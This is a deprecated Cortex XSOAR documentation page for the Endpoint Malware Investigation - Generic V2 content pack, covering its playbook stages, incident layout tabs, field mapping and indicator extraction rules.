Endpoint Malware Investigation - Generic V2
Deprecated
This article is deprecated. Please check the Malware Investigation and Response article instead.
The Endpoint Malware Investigation content pack provides a generic framework to handle malware investigation. This pack incorporates the most relevant integrations in Cortex XSOAR for handling malware incidents.
The playbook in this pack includes the following steps:
- endpoint enrichment
- file retrieval for reputation enrichment and detonation
- host forensics
- enterprise threat hunting,
- isolation of suspicious endpoints
- unisolation endpoints after investigation and blocking malicious indicators
These steps provide a solid basis and guidelines for malware investigation.
The new feature in Endpoint Malware Investigation - Generic V2 (available from version 6.1) is the indicators extraction rules. This feature extracts all the relevant fields from incidents in order to run the Endpoint Malware Investigation - Generic V2 playbook properly.
Pack Workflow#
First you need to decide in which incidents to activate the Malware incident type. If you don't have a default playbook or incident type for your endpoint protection integration, this pack could be a good fit. You just need to define the malware incident type for the relevant integration or create a dedicated Classifier.
What's in this Content Pack?#
Playbooks#
There is 1 playbook in this pack. This playbook uses all the other playbooks mentioned in this article.
Endpoint Malware Investigation - Generic V2
This playbook provides a framework for handling a malware investigation through all essential stages. The playbook consists of 7 stages where each stage contains the relevant playbook or tasks.
Enrichment#
The Get endpoint details - Generic playbook uses the generic !endpoint command to retrieve details on specific endpoints.
For additional information, refer to: Get endpoint details - Generic
Retrieve File#
The Retrieve File from Endpoint - Generic V2 playbook retrieves the required file for further investigation. This playbook can retrieve a file by its hash or by its file path.
For additional information, refer to: Retrieve File from Endpoint - Generic V2
Detonation#
Dynamic analysis for suspicious files is a significant stage in every malware incident. The analysis will not only determine if the file is malicious, but also provide indicators for further investigation. The Detonate File - Generic playbook detonates files through active integrations that support file detonation.
For additional information, refer to: Detonate File - Generic
Forensics#
The Get host forensics - Generic playbook provides additional forensics on the investigated host. Currently, this playbook uses only the Illusive network integration.
For additional information, refer to: Get host forensics - Generic
Threat Hunting#
The Threat Hunting - Generic playbook assists in hunting IOCs in your organization as part of the malware investigation.
For additional information, refer to: refer to: Threat Hunting - Generic
Isolation#
The Isolate Endpoint - Generic V2 playbook rapidly isolates the infected host and prevents the threat from spreading throughout your organization.
For additional information, refer to: Isolate Endpoint - Generic V2
Unisolation#
The Unisolate Endpoint - Generic playbook unisolates endpoints according to the endpoint ID or hostname that is provided by the playbook input.
For additional information, refer to: Unisolate Endpoint - Generic
Remediation and Blocking Indicators#
The Block Indicators - Generic v2 playbook blocks the malicious indicators that were discovered during the investigation. The playbook blocks files, IPs, URLs, and user accounts.
For additional information, refer to: Block Indicators - Generic v2
Layouts#
This layout has three tabs:
Incident info tab#
| Layout sections | Description |
|---|---|
| Case Details | Information that is associated with the incident, such as: Type, Owner, Source Brand, Source instance, Playbook, Severity. |
| Source Details | Information that is associated with the source host of the incident, such as: IP, user, hostname, src OS, etc. |
| File Attributes | Information regarding the suspicious file that was involved in the incident. |
| Threat Hunting Results | Results of the Threat Hunting - Generic playbook. |
| Notes | Comments entered by the user regarding the incident. |
| Team Members | A list of the analysts who participated in this incident. |
| Timeline Information | Information regarding the incident timeline, such as: time occurred, last update, closed time, etc. |
| Child Incidents | Incidents that were created from this incident. |
| Work Plan | Information regarding the playbook tasks from the Work Plan. |
| Linked Incidents | Incidents that were linked to the current incident. |
| Closing Information | Information regarding the closing of the incident. |
Investigation tab#
| Layout sections | Description |
|---|---|
| Malware Details | Malicious file details such as: tactics, technique, command line, etc. |
| Endpoint details | Details of the endpoints that were involved in the investigation. |
| Forensics | Forensic data that was retrieved by the Get host forensics playbook. |
| Investigation Report | The investigation summary report. |
| Indicators | Indicators that were extracted from the incident. |
Similar incidents tab#
Displays information for similar incidents based on the DBotFindSimilarIncidentsByIndicators script.
| Layout sections | Description |
|---|---|
| Incident ID | The similar incident ID. |
| Created | The date when the similar incident was created. |
| Name | The name of the similar incident. |
| Similarity Incident | The score for the similarity for the incident. |
| Parent CMD line | The arguments in the command line of the parent process. |
| File Path | The path of the suspicious file. |
| Command Line | The arguments of the command line that triggered the file. |
Before You Start#
Classification and Mapping#
(https://xsoar.pan.dev/docs/incidents/incident-classification-mapping)
To use the Endpoint Malware Investigation - Generic V2 playbook we strongly recommend that you map the playbook for the relevant integration.
- Navigate to Settings > Integrations > Classification and Mapping.
- Mark the checkbox of the relevant integration that you want to map.
- Click Duplicate.
- Click the copy you just created.
- From the Incident Type dropdown list, select Malware.
- From the Select Instance dropdown list, select the instance that you want to map.
After selecting your instance the Data fetched JSON will be loaded.
- Map the relevant fields from the JSON by selecting the keys and clicking Choose data path. See the table in the Auto Extraction section for the fields to map. For information about creating a mapper, see Create a Mapper.
- Click Save Version.
- Navigate to Settings > Integration > Servers & Services.
- Access the relevant integration instance setting and edit it as follows:
- From the Incident Type dropdown list, select Malware.
- For the Mapper, select the mapper you created.
Extraction Rules#
In the 6.1 version a new future was added to XSOAR. The Auto Extract from incidents fields feature extracts indicators from incidents fields and enriches their reputations using commands and scripts defined for the indicator type. You can automatically extract indicators in the following scenarios:
- When fetching incidents
- In a playbook task
- Using the command line
In order for the malware incident type layout to properly display the relevant fields and for the playbook to extract the fields it is important to map the fields as shown in the table below so that they will appear in the malware incident layout.
Refer to the incident classification and mapping documentation for relevant guidance.
Note: Fields that are not mapped will not appear in the layout.
| File Attributes | Source Details | Malware Details |
|---|---|---|
| File Name | Src | CMD |
| File Path | Host Name | Scenario |
| File Hash | Src NT Domain | Objective |
| MD5 | Src Operating System | Tactic |
| SHA1 | Users | Tactic ID |
| SHA256 | Technique | |
| File Size | Technique ID | |
| Signature | Description |
In the Endpoint Malware Investigation - Generic V2 playbook, the indicators are extracted according to the indicators extraction rules of the malware incident type.
To view the indicators that will be extracted:
- Navigate to Settings > Advanced > Incidents Types.
- Mark the Malware checkbox.
- Click Indicator Extraction Rules.
If you want to edit the indicator extraction rules, you need to detach the Malware incident type. When you finish editing the rules, you must reattach the Malware incident type.
- Navigate to Settings > Advanced > Incidents Types.
- Mark the Malware checkbox.
- Click Detach.
- Mark the Malware checkbox.
- Click Indicator Extraction Rules.
- Edit the rules.
- When you are finished editing, click Save.
- Mark the Malware checkbox.
- (Optional.) Click Reattach. Note that if you reattach the incident type, the next update will override any changes you made to the default playbook and indicator extraction rules.
Integrations#
The following is a list of integrations each playbook/sub-playbook uses.